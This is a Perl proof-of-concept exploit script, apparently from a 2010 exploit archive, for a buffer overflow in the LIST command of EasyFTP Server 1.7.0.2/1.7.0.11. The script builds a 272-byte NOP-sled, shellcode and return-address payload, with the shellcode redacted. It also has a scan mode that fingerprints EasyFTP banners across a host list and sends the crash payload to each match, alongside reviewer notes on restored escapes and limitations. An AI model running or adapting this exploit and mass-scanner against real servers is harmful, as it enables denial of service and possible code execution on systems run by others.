[dos / poc] - EasyFTP version 1.7.0.11 and version 1.7.0.2 Crash PoC
Posted on 18 October 2010
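#!/usr/bin/perl
# EasyFTP Server 1.7.0.11 / 1.7.0.2 -- crash PoC (oversized LIST argument)
#
# Original author: Inj3cti0n P4ck3t <fer_henrick@hotmail.com>, 18/10/2010.
# Author's test platform: Windows XP SP3 (Brazilian). Vulnerable builds:
#   - EasyFTP Server 1.7.0.2 EN   http://easyftpsvr.googlecode.com/files/easyftpsvr-1.7.0.2.zip
#   - EasyFTP Server 1.7.0.11 EN  http://easyftpsvr.googlecode.com/files/easyftp-server-1.7.0.11-en.zip
#
# Review notes on this listing:
#   * The rendered copy of the script lost every backslash and every line
#     break inside string literals. "\x90", "\x10\x3B\x88\x00", the regex
#     escapes and the line terminators below were restored from context;
#     "USER " / "PASS " are the decoded forms of the original hex literals
#     ("\x55\x53\x45\x52\x20" / "\x50\x41\x53\x53\x20"). RFC 959 terminates
#     commands with CRLF, which is what is sent here.
#   * The shellcode itself was redacted from the listing (see $SHELLCODE).
#     The original comment describes it as a 228-byte Metasploit calc.exe
#     payload, shikata_ga_nai, 1 iteration, bad chars \x00\x0a\x2f\x5c.
#   * The return address is a fixed CALL EDI at 0x00883B10 taken from the
#     author's build. On any other build (or any ASLR-enabled platform) it
#     will not redirect execution; the request then only crashes the
#     service, which is why the page is filed under dos/poc.
#   * "Server Exploited" below means nothing more than "the service refused a
#     new TCP connection two seconds later"; it is a crash heuristic, not
#     proof of code execution, and a slow or connection-limited server will
#     produce a false positive.
#   * Scan mode sends the crash payload to every host in the list whose FTP
#     greeting matches. Only run it against systems you are authorised to test.

use strict;
use warnings;
use IO::Socket::INET;

my $DEFAULT_PORT    = 21;
my $USERNAME        = 'anonymous';
my $PASSWORD        = 'adminadmin';
my $BUFFER_SIZE     = 272;   # "Buffer needed -> 272 bytes" in the original
my $CONNECT_TIMEOUT = 7;     # seconds, as in the original scanner
my $CRASH_DELAY     = 2;     # seconds to wait before re-probing the service
my $RET_ADDRESS     = "\x10\x3B\x88\x00";   # 0x00883B10 little-endian: CALL EDI

# Redacted in this listing. Replace with a payload that avoids the bad
# characters \x00\x0a\x2f\x5c; the NOP sled is sized so that
# sled + shellcode + return address always totals $BUFFER_SIZE bytes.
my $SHELLCODE = "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";

# Print the author's banner. Kept verbatim in content; the box layout of the
# original was lost in rendering and is only approximated here.
sub banner {
    print <<'BANNER';
##########################################################################################################
#                                                                                                        #
#  [*] PoC EasyFTP 1.7.0.X Crash                                                                         #
#                                                                                                        #
#  [*] Author: Inj3cti0n P4ck3t                                                                          #
#                                                                                                        #
#  [*] e-mail: fer_henrick@hotmail.com                                                                   #
#                                                                                                        #
#  [*] Date: 18/10/2010                                                                                  #
#                                                                                                        #
#  [*] Greetz: C00l3r - fvox - _MLK_ - DD3str0y3r - s4r4d0 - Sh0rtKiller                                 #
#              HADES - CODERED - FORAST - Colt7r - Z4i0n - M0nt3r                                        #
#              Th1nk3r - Hackinho - r0t3d - elemento_pcx - Observing                                     #
#              Believe - dr4k3 - Bl4ck9_f0x6                                                             #
#                                                                                                        #
#  [*] Version Vulnerable:                                                                               #
#                                                                                                        #
#      - EasyFTP Server 1.7.0.11 EN                                                                      #
#      - EasyFTP Server 1.7.0.2 EN                                                                       #
#                                                                                                        #
#  [*] System Operacional Tested:                                                                        #
#                                                                                                        #
#      - Windows XP PACK 3 Brazilian                                                                     #
#                                                                                                        #
#      - EasyFTP Server 1.7.0.2  => http://easyftpsvr.googlecode.com/files/easyftpsvr-1.7.0.2.zip        #
#      - EasyFTP Server 1.7.0.11 => http://easyftpsvr.googlecode.com/files/easyftp-server-1.7.0.11-en.zip#
#                                                                                                        #
###############################Code Exploit ##############################################################
BANNER
    return;
}

# Build the 272-byte LIST argument: NOP sled, shellcode, return address.
# Dies if the shellcode alone does not leave room for the return address.
# The trailing \x00 of the return address is a listed bad character; it is
# tolerated only because it is the last byte of the buffer (assumption from
# the original layout, not verified here).
sub build_payload {
    my $sled_length = $BUFFER_SIZE - length($SHELLCODE) - length($RET_ADDRESS);
    die "\n [x] Error: shellcode too long for a $BUFFER_SIZE-byte buffer\n"
        if $sled_length < 0;
    return ("\x90" x $sled_length) . $SHELLCODE . $RET_ADDRESS;
}

# Assemble the three FTP commands sent in a single write: USER, PASS, LIST.
sub build_request {
    my ($user, $pass) = @_;
    my $payload = build_payload();
    return "USER $user\r\n" . "PASS $pass\r\n" . "LIST $payload\r\n";
}

# Open a TCP connection with a connect timeout; returns the socket or undef
# (with $! set) on failure.
sub connect_to {
    my ($host, $port) = @_;
    return IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => 'tcp',
        Timeout  => $CONNECT_TIMEOUT,
    );
}

# Send the crash request to host:port. Returns true when the request was
# written, false (with $! set) when the connection could not be opened.
sub send_payload {
    my ($host, $port) = @_;
    my $sock = connect_to($host, $port) or return 0;
    print {$sock} build_request($USERNAME, $PASSWORD);
    close $sock;
    return 1;
}

# Read the first greeting line from an open socket, giving up after the
# connect timeout so an unresponsive host cannot stall the whole scan.
# Returns the line, or undef on timeout/EOF.
sub read_greeting {
    my ($sock) = @_;
    my $line;
    eval {
        local $SIG{ALRM} = sub { die "timeout\n" };
        alarm $CONNECT_TIMEOUT;
        $line = <$sock>;
        alarm 0;
    };
    alarm 0;
    return $line;
}

# Wait $CRASH_DELAY seconds, then report whether the service still accepts
# connections. A refused connection is taken as "crashed" -- see the caveat
# in the header: this is a heuristic, not proof of exploitation.
sub report_result {
    my ($host, $port) = @_;
    sleep $CRASH_DELAY;
    my $probe = connect_to($host, $port);
    if ($probe) {
        close $probe;
        print "\n [-] Server no exploited\n";
    }
    else {
        print "\n [+] Server Exploited\n";
    }
    return;
}

# Reduce one line of the host list to a bare host name. The original
# accepted either "host" or "http://host/path" entries; anything after the
# first "/" is dropped. Returns undef for blank lines.
sub extract_host {
    my ($entry) = @_;
    chomp $entry;
    $entry =~ s/^\s+|\s+$//g;
    return undef if $entry eq '';
    $entry = "http://$entry" unless $entry =~ m{http://};
    my ($host) = $entry =~ m{//([^/\s]+)};
    return $host;
}

# Option 1: fire the payload at the local server and report.
sub test_exploit {
    my ($host, $port) = ('127.0.0.1', $DEFAULT_PORT);
    send_payload($host, $port) or die "\n [x] Error: $!\n";
    report_result($host, $port);
    return;
}

# Option 2: read a host list, send the payload to every host whose FTP
# greeting contains the EasyFTP author's tag "BigFoolCat", and report each.
sub scan_exploit {
    print "\n [+] Digite o nome da lista de sites, exampl,: lista.txt: ";
    my $list_file = <STDIN>;
    chomp $list_file;
    $list_file =~ s/^\s+|\s+$//g;

    # Three-argument open: the file name comes from the operator's keyboard
    # and must never be interpreted as a mode or a pipe.
    open my $fh, '<', $list_file
        or die "\n [-] Could not open file: $!\n";
    my @entries = <$fh>;
    close $fh;

    my $tested = 0;
    for my $entry (@entries) {
        my $host = extract_host($entry);
        next unless defined $host;
        $tested++;

        # The original only ever probed port 21.
        for my $port ($DEFAULT_PORT) {
            my $sock = connect_to($host, $port);
            unless ($sock) {
                warn "\n [-] $host:$port: $!\n";
                next;
            }
            my $greeting = read_greeting($sock);
            close $sock;

            next unless defined $greeting && $greeting =~ /BigFoolCat/;

            unless (send_payload($host, $port)) {
                warn "\n [x] Error: $host:$port: $!\n";
                next;
            }
            print "\n [*] $host:$port";
            report_result($host, $port);
        }
    }
    # The original printed $#array (last index), under-counting by one.
    print "\n [+] Servers tested: $tested\n";
    return;
}

# The original printed the banner and menu only when no command-line
# argument was given; the option itself is always read from STDIN.
if (!$ARGV[0]) {
    banner();
    print <<'MENU';

 Options:

 [1] - Test Exploit
 [2] - Test ScanXploit

MENU
}

print "\n [+] Options: ";
my $option = <STDIN>;
$option = '' unless defined $option;
chomp $option;
$option =~ s/^\s+|\s+$//g;

if ($option eq '1') {
    test_exploit();
}
elsif ($option eq '2') {
    scan_exploit();
}
else {
    print "\n [+] Option invalid\n";
}

exit;

# Source: Inj3ct0r.com [2010-10-18]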